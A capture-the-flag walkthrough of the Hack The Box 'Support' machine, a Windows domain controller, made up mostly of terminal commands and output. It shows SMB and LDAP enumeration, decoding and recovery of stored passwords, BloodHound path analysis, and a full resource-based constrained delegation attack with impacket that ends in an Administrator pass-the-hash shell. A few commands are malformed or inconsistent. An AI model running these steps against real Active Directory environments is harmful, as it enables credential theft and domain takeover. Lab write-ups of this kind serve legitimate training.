┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49757/tcp open unknown syn-ack
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ nmap -p53,135,139,445,464,593,636,3268,5985,49757 $ip -Pn -oN script-scan -sCV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49757/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-05T22:01:48
|_ start_date: N/A
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
* Open ports: 53,135,139,445,464,593,636,3268,5985
* UDP Open ports: 53 - 88 - 123 - 389
* Services: DNS - RPC - SMB - NETBIOS - LDAP - KERBEROS - winRM
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ rpcclient -U "%" $ip
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
SMB
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
I opened a file and list share names in it, Then I created a for loop to find accessible share
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cat list| awk '{print $1}' | tee -a share.list
ADMIN$
C$
IPC$
NETLOGON
support-tools
SYSVOL
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ for share in $(cat share.list);do echo "\n\tShare Name is: $share\n" && smbclient -N \\\\$ip\\$share;done
<snip>
Share Name is: support-tools
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
<snip>
I will mount the remote share on my kali machine to easily navigate the share
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ mkdir mnt
┌──(kali㉿kali)-[~/…/HTB/machines/Support/New]
└─$ sudo mount -t cifs "\\\\$ip\\support-tools" ./mnt
Password for root@\\10.10.11.174\support-tools:
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ cd mnt
┌──(kali㉿kali)-[~/…/machines/Support/New]
└─$ ls
7-ZipPortable_21.07.paf.exe WiresharkPortable64_3.6.5.paf.exe windirstat1_1_2_setup.exe
SysinternalsSuite.zip npp.8.4.1.portable.x64.zip
UserInfo.exe.zip putty.exe
UserInfo.exe.zip File looks interesting, So I will copy it to windows machine
I can say that it's a decryption function to get the password in secure way involving base64 encoding and xor operation, So I asked chatGPT to rewrite this function in python to be able to run it on my host and here is the code
import base64
class Protected:
enc_password = "<encrypted>"
key = "<key>".encode('ascii')
@staticmethod
def get_password():
array = base64.b64decode(Protected.enc_password)
array2 = bytearray(array) # bytearray allows in-place modification
for i in range(len(array)):
array2[i] = array[i] ^ Protected.key[i % len(Protected.key)] ^ 223
return array2.decode('ascii')
# Decodes the bytearray to a string # Usage example:
password = Protected.get_password()
print(password)
I Created a zip file to upload it to bloodhound GUI after starting it
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ zip support.zip *.json
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:45250). It is available at http://localhost:7474
There may be a short delay until the server is ready.
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ bloodhound
I put custom query to bloodhound to see which user can PSRemote to the machine
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
I can also see that support User exists from rpcclient command
I searched for this account on bloodhound and knew that support account is a member of SHARED SUPPORT ACCOUNTS which has GenericAll rights on DC.SUPPORT.HTB which is an attack path known as Resource based constrianed delegation (RBCD), So If I have the support I can takeover the DC
I search a lot to get the syntax of ldapsearch as it's confusing for me to get information from ldap about user support
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ ldapsearch -H ldap://$ip -x -b "CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB" -s sub "*" -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | tee -a support.output
<snip>
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
<snip>
There is a value in info field, So I will try to connect to the machine with it and I got a hit :)
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ crackmapexec smb $ip -u support -p 'Ironside47pleasure40Watchful'
SMB 10.10.11.174 445 DC [+] support.htb\support:Ironside47pleasure40Watchful
We knew from bloodhound that we can PSRemote with user support, So I fired up evil-winrm and waited for a shell access
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ evil-winrm -i $ip -u support -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Documents>
*Evil-WinRM* PS C:\Users\support> type Desktop\user.txt
8959fba6ef693c03xxxxxxxxxxxxxx
User flag 8959fba6ef693c03xxxxxxxxxxxx
Privilege Escalation
The path to domain admins is already obvious now. We can get the help of this post if we want to perform attack from Linux:
We need a fake computer account and the name of the machine account that we can write attribute on.
The machine's name is DC$
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-addcomputer HTB.LOCAL/mrb3n -dc-ip 192.168.x.x -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' -dc-ip $ip -action write -delegate-from 'ATTACK$' -delegate-to 'DC$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ATTACK$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ATTACK$ (S-1-5-21-1677581083-3380853377-188903654-5601)
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-getST -spn 'cifs/DC.SUPPORT.HTB' -impersonate Administrator 'support.htb/ATTACK$:AttackerPC1!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ export KRB5CCNAME =`pwd/Administrator@cifs_DC.SUPPORT.HTB@SUPPORT.HTB.ccache
For some reason, I couldn't connect with psexec.py or dump hashes with secretsdump.py, So I switched to crackmpaexec
┌──(kali㉿kali)-[~/…/HTB/machines/Support]
└─$ impacket-psexec support.htb/administrator@$ip -hashes :bb06cbc02b39abedddxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.11.174.....
[*] Found writable share ADMIN$
[*] Uploading file bNtWYSHx.exe
[*] Opening SVCManager on 10.10.11.174.....
[*] Creating service yBfc on 10.10.11.174.....
[*] Starting service yBfc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
e99ab2203321xxxxxxxxxxxxxxxx
